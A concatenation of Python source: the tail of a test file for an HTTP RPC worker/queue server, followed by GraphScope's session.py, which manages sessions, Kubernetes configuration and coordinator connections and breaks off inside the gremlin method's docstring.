assert r_sum == [6, 6, 28, 28, 28, 28]
client({'data': 'stop'})
time.sleep(0.2)
assert stopped == 6
@mem('/test10/*')
def test10():
names = []
@run(0)
def worker():
s = requests.Session()
while True:
r = s.post(L + '/test10/*', headers={'Type': 'get+'})
name = r.headers['name']
if name == 'test10/exit':
s.post(L, data='exit', headers={'Type': 'result'})
break
value = r.json()['value'] if r.content else None
names.append((name, value))
if r.headers.get('async') != 'true':
r2 = s.post(L, data='ok', headers={'Type': 'result'})
assert r2.status_code == 200
if value == 3:
time.sleep(0.5)
elif value in (7, 8, 9):
time.sleep(0.2)
time.sleep(0.1)
assert post('/test10/one', json={'value': 1}).text == 'ok'
assert names[0] == ('test10/one', 1)
time.sleep(0.1)
assert post('/test10/two/system', json={'value': 2}).text == 'ok'
assert names[1] == ('test10/two/system', 2)
time.sleep(0.1)
assert post('/test10/delay', json={'value': 3}).text == 'ok'
assert names[2] == ('test10/delay', 3)
assert post('/test10/check4', json={'value': 4}).text == 'ok'
assert names[3] == ('test10/check4', 4)
time.sleep(0.1)
assert post('/test10/async5', json={'value': 5}, type='async').status_code == 200
time.sleep(0.1)
assert names[4] == ('test10/async5', 5)
time.sleep(0.1)
assert post('/test10/async6', json={'value': 6}, type='async').status_code == 200
time.sleep(0.1)
assert names[5] == ('test10/async6', 6)
assert post('/test10/async7', json={'value': 7}, type='async').status_code == 200
assert post('/test10/async8', json={'value': 8}, type='async').status_code == 200
assert post('/test10/async9', json={'value': 9}, type='async').status_code == 200
assert post('/test10/async10', json={'value': 10}, type='async').status_code == 200
assert post('/test10/exit').text == 'exit'
assert names[6] == ('test10/async7', 7)
assert names[7] == ('test10/async8', 8)
assert names[8] == ('test10/async9', 9)
assert names[9] == ('test10/async10', 10)
@mem('/test11')
def test11():
count = 0
def go(k, v):
@run(0)
def w():
nonlocal count
post('/test11', headers={'Type': 'get', k: v})
count += 1
go('set-id', '500')
go('SET-ID', '1000')
go('Set-ID', 'x1500x')
go('sET-iD', 'aBc2000')
go('sEt-id', '2500')
time.sleep(0.1)
details = get('/rpc/details').json()
assert set(details['test11']['worker_ids']) == {'500','1000','x1500x','aBc2000','2500'}
get('/test11', type='delete')
time.sleep(0.1)
assert count == 5
@mem('/test12')
def test12_if_present():
result = []
def push(x):
result.append(x)
@run(0)
def worker():
s = requests.Session()
r = s.get(L + '/test12', headers={'Type': 'worker'})
while True:
if r.text == 'stop':
s.post(L, data='ok', headers={'Option': 'stop'})
break
time.sleep(0.2)
push('w' + r.text)
time.sleep(0.2)
r = s.post(L, data=b'ok')
push('stop')
@run(0.1)
def command1():
push(1)
r = post('/test12', data='1', headers={'Option': 'if present'})
push((1, r.status_code, r.text))
@run(0.2)
def command1():
push(2)
r = post('/test12', data='2', headers={'Option': 'if present'})
push((2, r.status_code, r.text))
@run(0.3)
def command1():
push(3)
r = post('/test12', data='3', headers={'Option': 'if present'})
push((3, r.status_code, r.text))
time.sleep(0.4)
push(4)
r = post('/test12', data='4', headers={'Option': 'if present'})
push((4, r.status_code, r.text))
assert tuple(result) == (1, 2, 3, 'w1', 4, (1, 200, 'ok'), 'w2', (2, 200, 'ok'), 'w3', (3, 200, 'ok'), 'w4', (4, 200, 'ok'))
result = []
assert post('/test12', data='stop').text == 'ok'
assert result == ['stop']
assert get('/test12', headers={'Option': 'if present'}).status_code == 204
assert get('/test12', headers={'Option': 'if present'}).status_code == 204
|
session.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import pickle
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure
matching the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
# update graph flied from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
else:
return Context(context_dag_node, ret["context_key"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrapper_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
addr=gs_config.addr,
mode=gs_config.mode,
cluster_type=gs_config.cluster_type,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_gie_graph_manager_image=gs_config.k8s_gie_graph_manager_image,
k8s_zookeeper_image=gs_config.k8s_zookeeper_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_zookeeper_cpu=gs_config.k8s_zookeeper_cpu,
k8s_zookeeper_mem=gs_config.k8s_zookeeper_mem,
k8s_gie_graph_manager_cpu=gs_config.k8s_gie_graph_manager_cpu,
k8s_gie_graph_manager_mem=gs_config.k8s_gie_graph_manager_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
enable_gaia=gs_config.enable_gaia,
**kw
):
"""Construct a new GraphScope session.
Args:
config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
For str, it will identify it as a path and read the configuration file to build a
session if file exist. If not specified, the global default configuration
:code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
in environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
mode (str, optional): optional values are eager and lazy. Defaults to eager.
Eager execution is a flexible platform for research and experimentation, it provides:
An intuitive interface: Quickly test on small data.
Easier debugging: Call ops directly to inspect running models and test changes.
Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
k8s_namespace (str, optional): Contains the namespace to create all resource inside.
If param missing, it will try to read namespace from kubernetes context, or
a random namespace will be created and deleted if namespace not exist.
Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_gie_graph_manager_image (str, optional): The GraphScope interactive engine's graph manager image.
k8s_zookeeper_image (str, optional): The image of zookeeper, which used by GIE graph manager.
k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_zookeeper_cpu (float, optional):
Minimum number of CPU cores request for zookeeper container. Defaults to 0.5.
k8s_zookeeper_mem (str, optional):
Minimum number of memory request for zookeeper container. Defaults to '256Mi'.
k8s_gie_graph_manager_cpu (float, optional):
Minimum number of CPU cores request for graphmanager container. Defaults to 1.0.
k8s_gie_graph_manager_mem (str, optional):
Minimum number of memory request for graphmanager container. Defaults to '4Gi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
enable_gaia (bool, optional):
Launch graphscope with gaia enabled. Defaults to False.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
k8s_waiting_for_delete is True).
dangling_timeout_seconds (int, optional): After seconds of client disconnect,
coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
self._config_params = {}
self._accessable_params = (
"addr",
"mode",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_gie_graph_manager_image",
"k8s_zookeeper_image",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"enable_gaia",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
self._load_config(config, slient=False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# initial dag
self._dag = Dag()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
if "show_log" in kw:
warnings.warn(
"The `show_log` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(show_log=%s)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "log_level" in kw:
warnings.warn(
"The `log_level` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(log_level=%r)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "k8s_vineyard_shared_mem" in kw:
warnings.warn(
"The `k8s_vineyard_shared_mem` has been deprecated and has no effect, "
"please use `vineyard_shared_mem` instead."
% kw.pop("k8s_vineyard_shared_mem", None),
category=DeprecationWarning,
)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Not recognized value: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
# networkx module
self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
@property
def dag(self):
return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
@property
def closed(self):
return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except GRPCError as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
"""
if self._closed:
return
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
try:
self._grpc_client.close()
except Exception:
pass
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
try:
if self._launcher:
self._launcher.stop()
except Exception:
pass
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError("Operation on closed session." if msg is None else msg)
# Context manager
def __enter__(self):
"""Context management protocol.
Returns self and register self as default session.
"""
self._check_closed()
self.as_default()
return self
def __exit__(self, type, value, traceback):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
else:
return dag_node
def run(self, fetches, debug=False):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
If fetch is not a instance of :class:`Operation`. Or
the fetch has been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
fetch_handler = _FetchHandler(self.dag, fetches)
try:
response = self._grpc_client.run(fetch_handler.targets)
except FatalError:
self.close()
raise
return fetch_handler.wrapper_results(response)
def _connect(self):
if self._config_params["addr"] is not None:
# try connect to exist coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
# lanuch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError("Session initialize failed.")
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(self._coordinator_endpoint)
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return self._wrapper(
GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
that will be evaluated by :method:`sess.run` in eager mode.
Note that this method will be executed implicitly in eager mode when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
If you want to create a new instance under the same graph by different params, you should close
the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery in eager mode.
>>> interactive_query = sess.gremlin(g)
